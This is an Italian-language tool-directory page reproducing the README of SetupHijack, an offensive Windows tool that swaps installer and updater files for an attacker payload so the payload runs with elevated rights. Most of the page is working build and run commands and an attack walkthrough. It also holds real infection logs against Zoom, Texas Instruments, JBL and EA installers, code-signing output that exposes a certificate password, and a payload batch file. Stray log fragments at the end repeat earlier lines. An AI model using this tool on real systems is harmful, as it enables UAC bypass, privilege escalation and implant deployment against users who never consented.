Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SetupHijack — SetupHijack è uno strumento di ricerca sulla sicurezza che sfrutta le race condition e la gestione insicura dei file nei processi di installazione e aggiornamento delle applicazioni Windows. | Kitploit
Strumenti/GitHubGitHub/hackerhouse-opensource/setuphijack
Escalation di PrivilegiGenerazione di PayloadExploitMovimento LateralePenetration TestingRed Teaming
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack è uno strumento di ricerca sulla sicurezza che sfrutta le race condition e la gestione insicura dei file nei processi di installazione e aggiornamento delle applicazioni Windows.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2642947 mesi faRevisionato da Kitploit

SetupHijack


Panoramica

SetupHijack è uno strumento di ricerca sulla sicurezza che sfrutta le race condition e la gestione non sicura dei file nei processi di installazione e aggiornamento di Windows. Prende di mira scenari in cui programmi di installazione o aggiornamento privilegiati rilasciano file in %TEMP% o in altre posizioni scrivibili da tutti, consentendo a un attaccante di sostituire questi file prima che vengano eseguiti con privilegi elevati.

  • Non richiede permessi elevati per essere eseguito.
  • Non utilizza notifiche del file system (esegue invece polling per rilevare le modifiche).
  • Sfrutta le debolezze della firma del codice Authenticode e dei modelli di fiducia dei programmi di installazione.
  • Può infettare .exe, .msi e file batch (ad es., sysinfo, netstat, ipconfig).
  • Progettato esclusivamente per red team, penetration testing e ricerca sulla sicurezza.

L'uso previsto di questo strumento è quello di essere eseguito in background su un account utente compromesso con privilegi, al fine di elevare un altro processo dirottando i file rilasciati da programmi di installazione/aggiornamento.

Il grafico seguente mostra esempi reali di casi d'uso di questo exploit in diversi scenari che possono essere utilizzati per il bypass di UAC. I bypass di UAC sono considerati un confine di sicurezza quando si opera senza privilegi amministrativi (Adminless) e rappresentano un comune "requisito dell'attaccante" per disabilitare i controlli di sicurezza. Lo sfruttamento delle operazioni privilegiate dell'amministratore fornisce un accesso generico all'exploit per consentire al codice dannoso di eseguire il side-load o aumentare i privilegi del processo. Questo strumento può essere utilizzato per identificare applicazioni aggiuntive esposte agli stessi tipi di rischio; un attaccante può attendere l'esecuzione di questi processi come mezzo per ottenere diritti elevati senza interrompere i comportamenti dell'utente.

SetupHijack Vulnerability Discovery Chart

Come Funziona

  1. SetupHijack esegue una scansione continua di %TEMP% (e delle sottodirectory) per rilevare file di installazione nuovi o modificati.
  2. Quando viene rilevato un file target, viene sostituito con un payload fornito dall'utente (EXE, MSI o BAT), preservando facoltativamente l'originale come file .bak.
  3. Se il processo privilegiato esegue il file sostituito prima dei controlli di integrità, il payload viene eseguito con diritti elevati (ad es., SYSTEM o Administrator).
  4. Lo strumento registra tutte le azioni e mantiene una skiplist per evitare di reinfettare gli stessi file.

Nota sulla Firma del Codice

Questo progetto utilizza un processo di firma del codice modificato con SignToolEx.exe e SignToolExHook.dll per firmare payload e programmi di installazione. L'uso di certificati di firma del codice validi e di un timestamp Authenticode aumenterà il tasso di successo quando si bypassano i controlli di fiducia del programma di installazione e del sistema operativo.


Utilizzo

Build```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### Esecuzione (Opzioni)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • Eseguire SetupHijack.exe prima o durante un processo privilegiato di installazione/aggiornamento.
  • Per impostazione predefinita, lo strumento analizza tutte le posizioni di rilascio comuni: %TEMP%, %APPDATA% e %USERPROFILE%\Downloads.
  • È possibile disabilitare qualsiasi posizione con i flag -notemp, -noappdata o -nodownloads.
  • Il flag clean ripristina i backup in tutte le posizioni abilitate. Il flag verbose registra tutte le azioni.
  • Per l'escalation remota, utilizzare con shadow.exe o strumenti simili su Servizi terminal.

Esempio di flusso di attacco

  1. Crea il tuo payload e SetupHijack: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. Avvia SetupHijack: ```sh SetupHijack.exe
    root@kitploit:~
  3. Avvia il processo di installazione o aggiornamento target come amministratore.
  4. Se l'installer rilascia file in %TEMP% e li esegue con privilegi elevati, il tuo payload verrà sostituito ed eseguito.

Output di esempio

Di seguito un esempio reale di creazione ed esecuzione di SetupHijack, inclusi firma del codice e output dell'infezione:``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## Esempio di utilizzo per distribuire un implant

Di seguito è riportato uno screenshot che mostra SetupHijack in azione, mentre distribuisce un implant durante un'esecuzione privilegiata del programma di installazione:

![Example Use to Deploy An Implant](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## Note di sicurezza

- Questo strumento è destinato esclusivamente a test autorizzati e attività di ricerca.
- Lo sfruttamento di queste debolezze può portare alla compromissione completa di SYSTEM quando l'utente appartiene al gruppo Administrators.
- I programmi di installazione possono utilizzare controlli di hash/firma che bloccheranno questo attacco, ma molti ancora non lo fanno.
- Utilizzare sempre in un ambiente controllato.
- Se scopri una CVE o ricevi una bounty con questo strumento, dacci credito!

Prendere di mira una singola directory (come `%TEMP%`) alla volta può aumentare la probabilità di vincere una condizione di gara time-of-creation/time-of-use (TOCTOU), poiché consente un polling più rapido e meno contesa. Per la massima affidabilità, eseguire più istanze di SetupHijack, ognuna focalizzata su una singola directory. Per risultati ottimali, assicurati che il tuo payload (l'EXE che vuoi eseguire con privilegi elevati) includa un manifest che richieda l'elevazione (requireAdministrator) e sia firmato con un certificato di firma del codice valido che includa un timestamp Authenticode. Questo aumenta la possibilità di bypassare i controlli di fiducia del programma di installazione e del sistema operativo sui programmi di installazione.

## Vulnerabilità individuate

La seguente lista non esaustiva è stata identificata con gli "scenari migliori" che eseguono .MSI non attendibili, risultando in "NT AUTHORITY\SYSTEM", ma molti processi "elevati UAC" spesso vengono eseguiti tramite file .bat. Poiché l'esecuzione avviene sotto lo stesso USER SID, dato che %TEMP% è univoco per lo USER SID creato sotto %USERPROFILE% come parte della creazione della sessione interna, puoi elevare, all'interno di comandi della stessa sessione, a permessi completi di alta integrità manipolando il .bat che eredita i diritti del processo padre. "Temporary File Elevated Command Execution" è un riscontro comune, che può essere utilizzato per il bypass UAC e l'esecuzione senza privilegi di amministratore mentre il prompt sul Desktop sicuro mostra l'applicazione sfruttata (ad es. un aggiornamento Zoom).

- Zoom 6.6.1 (15968) usa %AppData% per installazione e aggiornamenti di .exe, consentendo movimento laterale tra processi e spoofing di processo (ad es. inviare una richiesta di elevazione dall'aggiornamento di Zoom). Gli eseguibili possono essere facilmente manipolati per attacchi di furto di credenziali e scopi malevoli.```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • msiexec.exe quando esegue install.msi viene eseguito con NT AUTHORITY\SYSTEM

  • L'exe di aggiornamento di Wireshark arriva tramite %Temp%, non ha vinto la corsa.

  • I controlli di firma del codice di Visual Studio sugli aggiornamenti impediscono lo sfruttamento, (testato leggermente .VSIX)

  • Il programma di installazione di Texas Instrument Code Composer può essere sfruttato per il bypass dell'autenticazione UAC il 25/09/2025. (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1

root@kitploit:~
- L'IDE Cursor è stato osservato creare file .bat e cronologia dei comandi in %TEMP% che possono essere sfruttati per iniettare
  comandi nella cronologia di Cursor, elevazione limitata. 


- JBL Quantum Engine contiene una vulnerabilità di iniezione di comandi (ora corretta) che esegue "net" (inclusi .bat) dalla
  stessa directory da cui viene eseguito JBL_QuantumENGINE_1.11.0.1511_x64. L'ultima versione utilizza un nuovo installer che
  non è vulnerabile a questa specifica vulnerabilità di iniezione di comandi (JBL_QuantumENGINE_Installer_2.2.13_x64.exe). Questo
  problema è stato scoperto come 0day a novembre 2022. Può essere utilizzato per bypassare le restrizioni UAC e ottenere 
  diritti di amministratore elevati. Il servizio SYSTEM scrive file .bat in %TEMP% per debug/diagnostica. ;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports "EA Anti-Cheat Installer" Esecuzione arbitraria di comandi con privilegi elevati. Titoli EA come "skate." installeranno un servizio anticheat che utilizza una posizione temporanea e scrivibile dall'utente. Un attaccante può sostituire EAAntiCheat.Installer.exe durante l'installazione STEAM, e un prompt di elevazione UAC proverrà dal motore STEAM, con logo e icona Valve, ma eseguirà il tuo payload exe con privilegi elevati. Vedi gli screenshot EASkateUAC per l'uso in attacchi di bypass UAC (confusione?).``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# Licenza

Questi file sono disponibili sotto la licenza BSD a 3 clausole.
Scarica lo strumento
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS